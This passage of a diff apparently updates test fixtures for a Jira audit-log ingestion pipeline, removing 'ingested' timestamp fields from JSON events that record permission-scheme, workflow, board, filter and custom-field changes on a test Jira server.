scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Assign Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3511,7 +3462,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924747709Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.165Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Edit Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3580,7 +3530,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924750082Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.163Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Issues\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3649,7 +3598,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:01.924751025Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.151Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Projects\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Application access\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3718,7 +3666,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.created", - "ingested": "2021-12-24T00:58:01.924751901Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.142Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.created\",\"action\":\"Permission scheme created\"},\"affectedObjects\":[{\"name\":\"Default software scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Default scheme for Software projects.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Default software scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3787,7 +3734,6 @@ }, "event": { "action": "Board created", - "ingested": "2021-12-24T00:58:01.924752758Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.072Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.boards\",\"category\":\"boards\",\"actionI18nKey\":\"Board created\",\"action\":\"Board created\"},\"affectedObjects\":[{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"},{\"name\":\"TEST board\",\"type\":\"BOARD\",\"uri\":\"http://jira.internal:8088/secure/RapidView.jspa?rapidView=1\",\"id\":\"1\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3850,7 +3796,6 @@ }, "event": { "action": "jira.auditing.filter.created", - "ingested": "2021-12-24T00:58:01.924753616Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.887Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.filters\",\"category\":\"filters\",\"actionI18nKey\":\"jira.auditing.filter.created\",\"action\":\"Filter created\"},\"affectedObjects\":[{\"name\":\"Filter for TEST board\",\"type\":\"FILTER\",\"uri\":\"http://jira.internal:8088/issues/?filter=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"from\":\"\"},{\"key\":\"JQL Query\",\"i18nKey\":\"jira.jql.query\",\"from\":\"\",\"to\":\"{project = \\\"TEST\\\"} order by Rank ASC\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"from\":\"\",\"to\":\"Filter for TEST board\"},{\"key\":\"Owner\",\"i18nKey\":\"common.concepts.owner\",\"from\":\"\",\"to\":\"test.user\"},{\"key\":\"Shared with\",\"i18nKey\":\"common.concepts.shared.with\",\"from\":\"[]\",\"to\":\"[Project: test (VIEW)]\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -3946,7 +3891,6 @@ }, "event": { "action": "jira.auditing.workflow.scheme.added.to.project", - "ingested": "2021-12-24T00:58:01.924754593Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.746Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.added.to.project\",\"action\":\"Workflow scheme added to project\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4009,7 +3953,6 @@ }, "event": { "action": "jira.auditing.workflow.scheme.created", - "ingested": "2021-12-24T00:58:01.924755462Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.732Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.scheme.created\",\"action\":\"Workflow scheme created\"},\"affectedObjects\":[{\"name\":\"TEST: Software Simplified Workflow Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=10100\",\"id\":\"10100\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow scheme is managed internally by Jira Software. Do not manually modify this workflow scheme.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"TEST: Software Simplified Workflow Scheme\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4078,7 +4021,6 @@ }, "event": { "action": "jira.auditing.workflow.created", - "ingested": "2021-12-24T00:58:01.924756341Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.710Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.workflow.created\",\"action\":\"Workflow created\"},\"affectedObjects\":[{\"name\":\"Software Simplified Workflow for Project TEST\",\"type\":\"WORKFLOW\",\"uri\":\"http://jira.internal:8088/secure/admin/workflows/ViewWorkflowSteps.jspa?workflowMode=live\u0026workflowName=Software Simplified Workflow for Project TEST\",\"id\":\"Software Simplified Workflow for Project TEST\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Generated by JIRA Software version 8.20.2. This workflow is managed internally by Jira Software. Do not manually modify this workflow.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Software Simplified Workflow for Project TEST\"},{\"key\":\"Status\",\"i18nKey\":\"common.words.status\",\"to\":\"To Do, In Progress, Done\"},{\"key\":\"Transition\",\"i18nKey\":\"admin.workflowtransition.transition\",\"to\":\"Create (To Do), To Do (To Do), In Progress (In Progress), Done (Done)\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4157,7 +4099,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:01.924757221Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.537Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Cannot Reproduce\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10003\",\"id\":\"10003\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"All attempts at reproducing this issue failed, or not enough information was available to reproduce the issue. Reading the code produces no clues as to why this behavior would occur. If more information appears later, please reopen the issue.\"}]}", "type": "info", "kind": "event" @@ -4221,7 +4162,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:01.924758086Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Duplicate\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10002\",\"id\":\"10002\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"The problem is a duplicate of an existing issue.\"}]}", "type": "info", "kind": "event" @@ -4285,7 +4225,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:01.924759046Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Won't Do\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10001\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"This issue won't be actioned.\"}]}", "type": "info", "kind": "event" @@ -4349,7 +4288,6 @@ }, "event": { "action": "jira.auditing.resolutions.created", - "ingested": "2021-12-24T00:58:01.924759950Z", "original": "{\"timestamp\":\"2021-11-22T00:08:33.534Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.workflows\",\"category\":\"workflows\",\"actionI18nKey\":\"jira.auditing.resolutions.created\",\"action\":\"New resolution created\"},\"affectedObjects\":[{\"name\":\"Done\",\"type\":\"RESOLUTION\",\"uri\":\"http://jira.internal:8088/secure/admin/EditResolution!default.jspa?id=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"common.concepts.description\",\"name\":\"Description\",\"value\":\"Work has been completed on this issue.\"}]}", "type": "info", "kind": "event" @@ -4413,7 +4351,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924760837Z", "original": "{\"timestamp\":\"2021-11-22T00:07:09.088Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10111\",\"id\":\"customfield_10111\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Story Points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Number Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4487,7 +4424,6 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-24T00:58:01.924761697Z", "original": "{\"timestamp\":\"2021-11-22T00:07:09.037Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Story\",\"type\":\"ISSUE_TYPE\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" @@ -4548,7 +4484,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924762558Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.794Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10110\",\"id\":\"customfield_10110\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Rank\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Global Rank\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4622,7 +4557,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924763493Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.725Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10109\",\"id\":\"customfield_10109\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Epic Link Relationship\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4696,7 +4630,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924764352Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.694Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10108\",\"id\":\"customfield_10108\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Jira Software sprint field\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Sprint\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Jira Sprint Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4770,7 +4703,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924765219Z", "original": "{\"timestamp\":\"2021-11-22T00:07:01.669Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10107\",\"id\":\"customfield_10107\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Colour\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Colour of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4844,7 +4776,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924766113Z", "original": "{\"timestamp\":\"2021-11-22T00:07:01.644Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10106\",\"id\":\"customfield_10106\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Status\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Status of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4918,7 +4849,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924767044Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.522Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10105\",\"id\":\"customfield_10105\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Provide a short name to identify this epic.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Name\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Name of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4992,7 +4922,6 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-24T00:58:01.924767911Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.485Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" @@ -5053,7 +4982,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:01.924768840Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.340Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5110,7 +5038,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:01.924769711Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.332Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5167,7 +5094,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924770565Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.313Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10104\",\"id\":\"customfield_10104\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Original story points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Original story points\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5236,7 +5162,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:01.924771544Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.266Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target 